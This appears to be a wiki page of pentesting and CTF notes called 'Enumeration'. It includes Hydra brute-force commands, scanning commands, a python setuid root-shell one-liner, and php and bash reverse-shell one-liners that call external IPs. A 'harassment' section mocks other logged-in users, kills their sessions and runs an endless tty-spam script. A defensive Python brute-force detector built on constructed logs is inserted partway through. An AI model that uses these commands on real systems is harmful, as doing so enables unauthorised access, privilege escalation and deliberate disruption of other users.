Difference between revisions of "Enumeration"

From Void-Byte

Revision as of 21:54, 11 November 2020

=== Hydra ===

# If you need to bruteforce SSH.

hydra -L /home/user/list.txt -P /usr/share/wordlists/passlist.txt 0.0.0.0 ssh

# If you need to bruteforce FTP.

hydra -L /home/user/list.txt -P /usr/share/wordlists/rockyou.txt ftp://0.0.0.0

# If you need to bruteforce an HTTP (POST) form.

hydra -L /home/user/list.txt -P /usr/share/wordlists/passlist.txt 0.0.0.0 http-post-form "/api/user/login:username=^USER^&password=^PASS^:F=incorrect" -V
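A defender-side companion to the Hydra commands above, added here as an example and not part of the original page: a small Python detector that flags any source address producing a burst of failed sshd logins inside a sliding time window, which is the trace a `-L`/`-P` run leaves in auth.log. The log lines, host name, addresses, threshold and window are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines (syslog format); host name and IPs are made up.
SAMPLE_LOG = """\
Nov 11 21:50:01 host sshd[1201]: Failed password for invalid user admin from 198.51.100.7 port 50122 ssh2
Nov 11 21:50:02 host sshd[1203]: Failed password for invalid user test from 198.51.100.7 port 50124 ssh2
Nov 11 21:50:02 host sshd[1205]: Failed password for root from 198.51.100.7 port 50126 ssh2
Nov 11 21:50:03 host sshd[1207]: Failed password for invalid user guest from 198.51.100.7 port 50128 ssh2
Nov 11 21:50:03 host sshd[1209]: Failed password for user from 198.51.100.7 port 50130 ssh2
Nov 11 21:50:04 host sshd[1211]: Failed password for invalid user oracle from 198.51.100.7 port 50132 ssh2
Nov 11 21:55:40 host sshd[1300]: Failed password for alice from 203.0.113.5 port 41000 ssh2
Nov 11 21:55:48 host sshd[1302]: Accepted password for alice from 203.0.113.5 port 41002 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_failures(log_text, year=2020):
    """Yield (timestamp, source_ip, username) for each failed sshd login line."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            # syslog lines carry no year, so one is assumed for parsing
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["src"], m["user"]

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {source_ip: distinct_usernames_tried} for every source that
    produced at least `threshold` failures inside any `window_seconds` span."""
    by_src = defaultdict(list)
    for ts, src, user in parse_failures(log_text):
        by_src[src].append((ts, user))
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        start = 0  # left edge of the sliding window over this source's events
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged[src] = len({u for _, u in events})
                break
    return flagged
```

Calling `detect_bruteforce(SAMPLE_LOG)` on the constructed lines flags only 198.51.100.7 (six failures across six usernames in three seconds), while the single failed login from 203.0.113.5 followed by a success stays below the threshold.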


=== Directory Enumeration ===

NMAP the IP address and perform a service scan.

GOBUSTER each IP address and port.

HASH-IDENTIFIER any hashes found.

!! IF ACCESS GAINED !!

CHECK /etc/password

CHECK /etc/crontab

*** STEGANOGRAPHY ***

steghide extract -sf <filename>

stegcracker <filename> <wordlist>

ffuf -w /usr/share/wordlists/common.txt -u http://0.0.0.0/FUZZ -t 120

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.210.9/hidden

nmap -sS -A 10.10.210.9

linpeas if access to linux machine

***

ALWAYS TRY TO RUN 'sudo -l'

For every user: find / -type f -perm -u=s 2>/dev/null; getcap -r / 2>/dev/null

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

****

***

ALWAYS 'sudo -l' IF YOU GAIN ACCESS

SEE IF YOU CAN FIND /BIN/BASH or /BIN/SH FOR ESCALATION WITH "NOPASSWD"

***

***

REVERSE SHELLS

php -r '$sock=fsockopen("192.168.0.195",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

bash -i >& /dev/tcp/0.0.0.0/1234 0>&1

***

***

SHOW ALL OTHER CONNECTIONS

netstat -natp

***

** HARASSMENT **

There's probably an easier way, but I do this:

See who's logged into your machine -- use who or w:

> who  

mmrozek  tty1         Aug 17 10:03  

mmrozek  pts/3        Aug 17 10:09 (:pts/2:S.0)

Look up the process ID of the shell their TTY is connected to:

> ps t  

PID   TTY      STAT   TIME COMMAND  

30737 pts/3    Ss     0:00 zsh

Laugh at their impending disconnection (this step is optional, but encouraged)

> echo "HAHAHAHAHAHAHAHA" | write mmrozek pts/3

Kill the corresponding process:

> kill -9 30737

HARASSMENT SCRIPT

#!/bin/bash

# Loop forever, sending an empty line to the given user's tty with write(1).

while true

do

  echo '' | write username pts/?

done

*** ONE LINER REVERSE SHELLS ***

https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/os-cmd-execution/reverse-shell-one-liners.doc.txt

*** SHOW IPS ON MACHINE ***

netstat -natlp

(kick them off with [kill -9 PID] after finding PID with [netstat -np | grep PORT])


=== FTP ===

If port 21 is open, attempt to sign in as anonymous (with a randomized password).

If you can sign in as anonymous (or as other users), see if you can GET or PUT (don't forget to set the local directory with 'lcd /usr/home/Downloads').

You can also check for hidden files with 'ls -alh'.